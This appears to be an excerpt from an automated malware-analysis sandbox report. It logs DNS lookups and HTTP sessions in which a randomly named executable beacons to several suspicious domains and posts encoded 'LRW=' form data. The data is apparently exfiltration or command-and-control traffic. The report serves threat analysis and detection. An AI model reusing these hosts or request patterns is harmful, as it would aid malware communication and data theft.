                                                                                                            Nov 27, 2024 16:44:11.813591003 CET8049853154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:13.209788084 CET4985380192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:13.330367088 CET8049853154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:13.330459118 CET4985380192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:14.241475105 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:14.361958981 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:14.362072945 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:14.372795105 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:14.493123055 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.038902998 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.038922071 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.038995981 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.039007902 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.039079905 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.039097071 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.039108992 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.039110899 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.039123058 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.039156914 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.039302111 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.039330006 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.039341927 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.039341927 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.039380074 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.159933090 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.159967899 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.160089016 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.163788080 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.163830042 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.163896084 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.267220974 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.267340899 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.267462969 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.272604942 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.273983002 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.274029016 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.274046898 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.278599024 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.278659105 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.278686047 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.285677910 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.285784960 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.288695097 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.408736944 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:21.789155006 CET4987880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:21.909564972 CET8049878194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:21.909666061 CET4987880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:21.925726891 CET4987880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:22.046521902 CET8049878194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:23.316205025 CET8049878194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:23.316293001 CET8049878194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:23.316349983 CET4987880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:23.427500963 CET4987880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:24.448442936 CET4988480192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:24.570327044 CET8049884194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:24.570410967 CET4988480192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:24.587764978 CET4988480192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:24.709201097 CET8049884194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:25.958144903 CET8049884194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:25.958183050 CET8049884194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:25.958240032 CET4988480192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:26.099571943 CET4988480192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:27.121491909 CET4989180192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:27.243498087 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.243582964 CET4989180192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:27.263787031 CET4989180192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:27.383924961 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.383955956 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.383965969 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.384046078 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.384053946 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.384172916 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.384200096 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.384244919 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.384254932 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:28.671099901 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:28.724138021 CET4989180192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:28.771012068 CET4989180192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:28.798119068 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:28.798180103 CET4989180192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:29.790108919 CET4989880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:29.910196066 CET8049898194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:29.910340071 CET4989880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:29.924264908 CET4989880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:30.044363022 CET8049898194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:31.285835981 CET8049898194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:31.285865068 CET8049898194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:31.286010981 CET4989880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:31.288933992 CET4989880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:31.408817053 CET8049898194.58.112.174192.168.2.4
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 27, 2024 16:43:17.612473965 CET5319153192.168.2.41.1.1.1
                                                                                                            Nov 27, 2024 16:43:18.099901915 CET53531911.1.1.1192.168.2.4
                                                                                                            Nov 27, 2024 16:43:34.432089090 CET6363953192.168.2.41.1.1.1
                                                                                                            Nov 27, 2024 16:43:35.253838062 CET53636391.1.1.1192.168.2.4
                                                                                                            Nov 27, 2024 16:43:49.712816000 CET4986253192.168.2.41.1.1.1
                                                                                                            Nov 27, 2024 16:43:50.443731070 CET53498621.1.1.1192.168.2.4
                                                                                                            Nov 27, 2024 16:44:05.243964911 CET6239853192.168.2.41.1.1.1
                                                                                                            Nov 27, 2024 16:44:06.203043938 CET53623981.1.1.1192.168.2.4
                                                                                                            Nov 27, 2024 16:44:21.306240082 CET6225853192.168.2.41.1.1.1
                                                                                                            Nov 27, 2024 16:44:21.781784058 CET53622581.1.1.1192.168.2.4
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Nov 27, 2024 16:43:17.612473965 CET192.168.2.41.1.1.10x91b7Standard query (0)www.dojodigitize.shopA (IP address)IN (0x0001)false
                                                                                                            Nov 27, 2024 16:43:34.432089090 CET192.168.2.41.1.1.10xa5f1Standard query (0)www.17jkgl.comA (IP address)IN (0x0001)false
                                                                                                            Nov 27, 2024 16:43:49.712816000 CET192.168.2.41.1.1.10xbda1Standard query (0)www.alvinsd.buzzA (IP address)IN (0x0001)false
                                                                                                            Nov 27, 2024 16:44:05.243964911 CET192.168.2.41.1.1.10x528fStandard query (0)www.shipincheshi.todayA (IP address)IN (0x0001)false
                                                                                                            Nov 27, 2024 16:44:21.306240082 CET192.168.2.41.1.1.10x4082Standard query (0)www.elinor.clubA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Nov 27, 2024 16:43:18.099901915 CET1.1.1.1192.168.2.40x91b7No error (0)www.dojodigitize.shopdojodigitize.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 27, 2024 16:43:18.099901915 CET1.1.1.1192.168.2.40x91b7No error (0)dojodigitize.shop15.197.142.173A (IP address)IN (0x0001)false
                                                                                                            Nov 27, 2024 16:43:18.099901915 CET1.1.1.1192.168.2.40x91b7No error (0)dojodigitize.shop3.33.152.147A (IP address)IN (0x0001)false
                                                                                                            Nov 27, 2024 16:43:35.253838062 CET1.1.1.1192.168.2.40xa5f1No error (0)www.17jkgl.com38.6.78.235A (IP address)IN (0x0001)false
                                                                                                            Nov 27, 2024 16:43:50.443731070 CET1.1.1.1192.168.2.40xbda1No error (0)www.alvinsd.buzz139.162.181.76A (IP address)IN (0x0001)false
                                                                                                            Nov 27, 2024 16:43:50.443731070 CET1.1.1.1192.168.2.40xbda1No error (0)www.alvinsd.buzz172.104.149.86A (IP address)IN (0x0001)false
                                                                                                            Nov 27, 2024 16:44:06.203043938 CET1.1.1.1192.168.2.40x528fNo error (0)www.shipincheshi.today154.23.176.197A (IP address)IN (0x0001)false
                                                                                                            Nov 27, 2024 16:44:06.203043938 CET1.1.1.1192.168.2.40x528fNo error (0)www.shipincheshi.today154.23.176.232A (IP address)IN (0x0001)false
                                                                                                            Nov 27, 2024 16:44:21.781784058 CET1.1.1.1192.168.2.40x4082No error (0)www.elinor.club194.58.112.174A (IP address)IN (0x0001)false
                                                                                                            • www.dojodigitize.shop
                                                                                                            • www.17jkgl.com
                                                                                                            • www.alvinsd.buzz
                                                                                                            • www.shipincheshi.today
                                                                                                            • www.elinor.club
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.44974315.197.142.173805608C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 27, 2024 16:43:18.238176107 CET466OUTGET /3acc/?LRW=skYxN//30ryIi85Wi0QpETYUbcdPFuXI+97QewxhrY3NM2hqn6Sq2BPHPiKxfL80eN+v/gcRWuFAYeqrMVkPGGlMHJiH0BFPFC9u+m//81WV26UqMu5nMks=&fvqp6=9vfXK HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Host: www.dojodigitize.shop
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Nov 27, 2024 16:43:19.386939049 CET133INHTTP/1.1 404 Not Found
                                                                                                            Server: awselb/2.0
                                                                                                            Date: Wed, 27 Nov 2024 15:43:19 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            WAFRule: 5


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.44976838.6.78.235805608C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 27, 2024 16:43:35.393528938 CET719OUTPOST /yjgs/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.17jkgl.com
                                                                                                            Origin: http://www.17jkgl.com
                                                                                                            Referer: http://www.17jkgl.com/yjgs/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 200
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 30 4e 4e 46 6c 62 32 45 62 2b 77 37 49 74 6d 45 6d 70 34 70 6c 50 59 7a 54 5a 4e 54 45 74 47 44 4e 68 4d 54 53 78 57 4e 6f 77 30 41 39 37 56 41 37 30 33 52 32 33 35 56 46 2b 48 4c 59 64 4c 54 6e 79 75 6c 77 71 67 33 73 53 74 42 5a 52 34 34 4e 41 44 70 79 4e 2f 4e 4b 36 50 54 7a 54 52 51 53 52 70 67 67 30 6f 4d 65 61 6e 65 51 79 38 56 36 79 36 39 6e 75 70 4b 45 34 64 6b 53 77 49 43 50 4f 72 71 65 34 34 4f 42 54 31 51 77 38 4a 4b 48 4c 6e 7a 54 75 54 53 47 4f 58 48 49 7a 2b 51 76 44 75 55 58 75 33 6e 41 51 51 6b 55 65 34 70 58 38 54 78 78 6e 51 42 4d 6a 6d 49 79 6f 34 5a 34 67 3d 3d
                                                                                                            Data Ascii: LRW=0NNFlb2Eb+w7ItmEmp4plPYzTZNTEtGDNhMTSxWNow0A97VA703R235VF+HLYdLTnyulwqg3sStBZR44NADpyN/NK6PTzTRQSRpgg0oMeaneQy8V6y69nupKE4dkSwICPOrqe44OBT1Qw8JKHLnzTuTSGOXHIz+QvDuUXu3nAQQkUe4pX8TxxnQBMjmIyo4Z4g==
                                                                                                            Nov 27, 2024 16:43:36.752314091 CET262INHTTP/1.1 400 Bad Request
                                                                                                            Date: Wed, 27 Nov 2024 15:43:36 GMT
                                                                                                            Server: Apache
                                                                                                            Upgrade: h2
                                                                                                            Connection: Upgrade, close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Content-Encoding: gzip
                                                                                                            Content-Length: 33
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 92 54 0e 5c 0d 00 00 00
                                                                                                            Data Ascii: 310Q/Qp/KT\


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.44977538.6.78.235805608C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 27, 2024 16:43:38.051320076 CET739OUTPOST /yjgs/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.17jkgl.com
                                                                                                            Origin: http://www.17jkgl.com
                                                                                                            Referer: http://www.17jkgl.com/yjgs/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 220
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 30 4e 4e 46 6c 62 32 45 62 2b 77 37 4a 4d 57 45 6c 49 34 70 79 66 59 79 4f 70 4e 54 57 74 48 4b 4e 67 77 54 53 77 53 6e 6f 46 63 41 34 72 6c 41 38 31 33 52 33 33 35 56 50 65 48 4f 46 4e 4c 61 6e 79 6a 61 77 71 4d 33 73 53 70 42 5a 51 49 34 4f 78 44 75 79 64 2f 54 4c 4b 50 52 39 7a 52 51 53 52 70 67 67 30 39 72 65 5a 58 65 51 43 4d 56 37 54 36 79 38 4f 70 4c 4e 59 64 6b 41 41 49 47 50 4f 71 48 65 35 6b 6b 42 56 78 51 77 35 74 4b 4a 2f 4b 42 4a 2b 54 55 62 2b 57 57 5a 54 44 36 33 44 62 6a 61 4e 71 47 64 42 38 2b 56 59 31 7a 47 4e 79 6d 6a 6e 30 79 52 6b 76 38 2f 72 46 51 6a 6c 78 6c 7a 4b 49 68 2b 74 6a 45 6d 37 78 73 39 67 61 70 76 34 77 3d
                                                                                                            Data Ascii: LRW=0NNFlb2Eb+w7JMWElI4pyfYyOpNTWtHKNgwTSwSnoFcA4rlA813R335VPeHOFNLanyjawqM3sSpBZQI4OxDuyd/TLKPR9zRQSRpgg09reZXeQCMV7T6y8OpLNYdkAAIGPOqHe5kkBVxQw5tKJ/KBJ+TUb+WWZTD63DbjaNqGdB8+VY1zGNymjn0yRkv8/rFQjlxlzKIh+tjEm7xs9gapv4w=
                                                                                                            Nov 27, 2024 16:43:39.370203018 CET262INHTTP/1.1 400 Bad Request
                                                                                                            Date: Wed, 27 Nov 2024 15:43:39 GMT
                                                                                                            Server: Apache
                                                                                                            Upgrade: h2
                                                                                                            Connection: Upgrade, close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Content-Encoding: gzip
                                                                                                            Content-Length: 33
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 92 54 0e 5c 0d 00 00 00
                                                                                                            Data Ascii: 310Q/Qp/KT\


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.44978138.6.78.235805608C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 27, 2024 16:43:40.707643032 CET10821OUTPOST /yjgs/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.17jkgl.com
                                                                                                            Origin: http://www.17jkgl.com
                                                                                                            Referer: http://www.17jkgl.com/yjgs/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 10300
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 30 4e 4e 46 6c 62 32 45 62 2b 77 37 4a 4d 57 45 6c 49 34 70 79 66 59 79 4f 70 4e 54 57 74 48 4b 4e 67 77 54 53 77 53 6e 6f 44 45 41 34 34 64 41 38 57 66 52 6c 6e 35 56 4d 65 48 50 46 4e 4b 49 6e 79 72 65 77 71 51 42 73 52 42 42 59 7a 51 34 50 44 72 75 38 64 2f 54 4f 36 50 63 7a 54 52 46 53 58 4a 73 67 30 74 72 65 5a 58 65 51 42 55 56 38 43 36 79 37 2b 70 4b 45 34 64 6f 53 77 49 2b 50 4b 48 79 65 35 51 65 42 46 52 51 78 5a 64 4b 4c 4d 79 42 52 75 54 57 59 2b 57 4f 5a 54 50 68 33 44 48 56 61 4f 33 54 64 43 67 2b 55 66 6b 52 5a 4a 79 4c 2f 48 38 76 4c 54 66 76 33 36 70 31 71 6c 4d 59 79 70 42 34 69 38 44 59 73 38 4d 58 6c 53 69 45 32 2b 4e 65 6d 48 78 62 51 4e 77 70 47 79 54 41 68 64 47 7a 72 53 4c 79 77 76 39 77 4a 51 4c 38 48 48 32 31 35 38 41 6c 30 6c 6f 78 47 78 35 72 79 54 4f 78 2b 44 72 4d 6f 51 64 67 64 68 34 47 6b 38 66 78 33 37 30 4a 4b 75 34 6d 46 47 66 37 43 78 46 38 41 32 30 5a 6a 75 37 61 31 41 43 44 66 62 4a 41 54 61 31 44 50 57 6e 35 30 4b 38 59 58 54 36 6c 6a 76 30 4e 4d 39 [TRUNCATED]
                                                                                                            Data Ascii: LRW=0NNFlb2Eb+w7JMWElI4pyfYyOpNTWtHKNgwTSwSnoDEA44dA8WfRln5VMeHPFNKInyrewqQBsRBBYzQ4PDru8d/TO6PczTRFSXJsg0treZXeQBUV8C6y7+pKE4doSwI+PKHye5QeBFRQxZdKLMyBRuTWY+WOZTPh3DHVaO3TdCg+UfkRZJyL/H8vLTfv36p1qlMYypB4i8DYs8MXlSiE2+NemHxbQNwpGyTAhdGzrSLywv9wJQL8HH2158Al0loxGx5ryTOx+DrMoQdgdh4Gk8fx370JKu4mFGf7CxF8A20Zju7a1ACDfbJATa1DPWn50K8YXT6ljv0NM9nvIeMzIFlHn3IGjLtOJxgoRIouNXoNn1V1uFCNuzjI2bFAHoUpOEYI37olGUEtUPsTz+2N2yHdi8p1rrL/449T+bQN3NyHaSz+0AtM7UeBMo/v5gcKHfkbvYbMX0Mt9BPAv4mXwHRHq5sgClOAMphhUVbNCyWYe+Lf0v8+X87Q5ZmxvobSDfr4RpH+HpGexTbr3kPFCvk58dQC4gxcjARAgjlJtXG8f1ENnWsQ0cUnxt31hkFBgoKVnipFk2za3l6Q5rd4j2Fm7hg2DID1faAXRUifp3eJVzJDtdWwZVsqJAUtY+WbSMQN0w6CY3IjMaCxhUDsXD7/jFjw4gV36S3bnC1AZc0Z0IvZzqvzV3h8skPnFGpQ5Q8yP0WtyPN4lk1PMsEj+C4EtqkKitG1jXjRa/BCYAeKV0n2Ck2CJddkfysKjcyqgc2bJlvzJ6JZiwahFx0VcTv06S4s8BFTGFksAtcz74/zkc+NIb0jCQB9OOyZ0jDwZKVuUNjrxZRxc0xQkGx81H6DY1s6eguMMuesD6fIm9ys4yNZ3m1OJUNkBowbjz/9WWCrfLQxjS0KZEqKob3B0tTAKciUWUh0IiehIZ8Dofb2Ig0bNvwjGDLT+Vb2zdfDadFELVAO8Dj+ISgoGkt2T83VnuaUpkYjXdmEzDWwh3R3OVhR [TRUNCATED]
                                                                                                            Nov 27, 2024 16:43:42.095628977 CET262INHTTP/1.1 400 Bad Request
                                                                                                            Date: Wed, 27 Nov 2024 15:43:41 GMT
                                                                                                            Server: Apache
                                                                                                            Upgrade: h2
                                                                                                            Connection: Upgrade, close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Content-Encoding: gzip
                                                                                                            Content-Length: 33
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 92 54 0e 5c 0d 00 00 00
                                                                                                            Data Ascii: 310Q/Qp/KT\


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.44978738.6.78.235805608C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 27, 2024 16:43:43.359163046 CET459OUTGET /yjgs/?LRW=5PllmvK0caJhA9qO+og5+P8kc5JWR+uQLy91XhuloCAo6K0czluNggt7J8fRT5aF3DbStYNhlgg+eys4IUnD8eH0N6/eozV0E04Jm3Q8YYXSei9vmTSoi+w=&fvqp6=9vfXK HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Host: www.17jkgl.com
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Nov 27, 2024 16:43:44.696460009 CET189INHTTP/1.1 503 Service Unavailable
                                                                                                            Date: Wed, 27 Nov 2024 15:43:44 GMT
                                                                                                            Server: Apache
                                                                                                            Upgrade: h2
                                                                                                            Connection: Upgrade, close
                                                                                                            Content-Length: 0
                                                                                                            Content-Type: text/html; charset=utf-8


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.449803139.162.181.76805608C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 27, 2024 16:43:50.644484043 CET725OUTPOST /d43q/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.alvinsd.buzz
                                                                                                            Origin: http://www.alvinsd.buzz
                                                                                                            Referer: http://www.alvinsd.buzz/d43q/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 200
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 6e 4d 61 64 63 5a 31 78 70 6c 2f 72 70 70 59 79 4e 68 57 41 59 58 77 4c 5a 51 66 76 70 52 47 2f 4d 6e 6c 54 73 69 39 53 71 4c 70 35 77 4f 30 54 50 37 35 69 36 72 4b 32 7a 4a 55 58 62 71 39 51 32 6a 74 47 4e 31 33 68 38 78 31 32 49 65 53 52 41 36 45 6d 37 55 79 47 31 68 53 6a 46 36 54 57 43 61 66 79 54 48 61 50 63 66 53 53 7a 74 41 50 63 72 72 70 31 41 59 71 72 34 4c 63 43 41 58 61 4f 77 70 5a 6f 56 72 62 73 58 77 30 47 4c 42 41 36 6b 69 68 43 4d 36 33 47 57 4f 44 43 77 75 69 39 78 71 63 6c 48 72 51 34 70 4e 61 52 6e 45 66 41 54 75 51 5a 6d 53 6d 61 36 6d 6b 2b 44 51 31 66 77 3d 3d
                                                                                                            Data Ascii: LRW=nMadcZ1xpl/rppYyNhWAYXwLZQfvpRG/MnlTsi9SqLp5wO0TP75i6rK2zJUXbq9Q2jtGN13h8x12IeSRA6Em7UyG1hSjF6TWCafyTHaPcfSSztAPcrrp1AYqr4LcCAXaOwpZoVrbsXw0GLBA6kihCM63GWODCwui9xqclHrQ4pNaRnEfATuQZmSma6mk+DQ1fw==
                                                                                                            Nov 27, 2024 16:43:51.962773085 CET1206INHTTP/1.1 200 OK
                                                                                                            Server: openresty/1.25.3.2
                                                                                                            Date: Wed, 27 Nov 2024 15:43:51 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: session_id=cf1b2716bf19a9da6498878cf92c0402; Path=/; HttpOnly; Max-Age=86400; Expires=Wednesday, 27-Nov-2024 15:43:51 GMT
                                                                                                            Content-Encoding: gzip
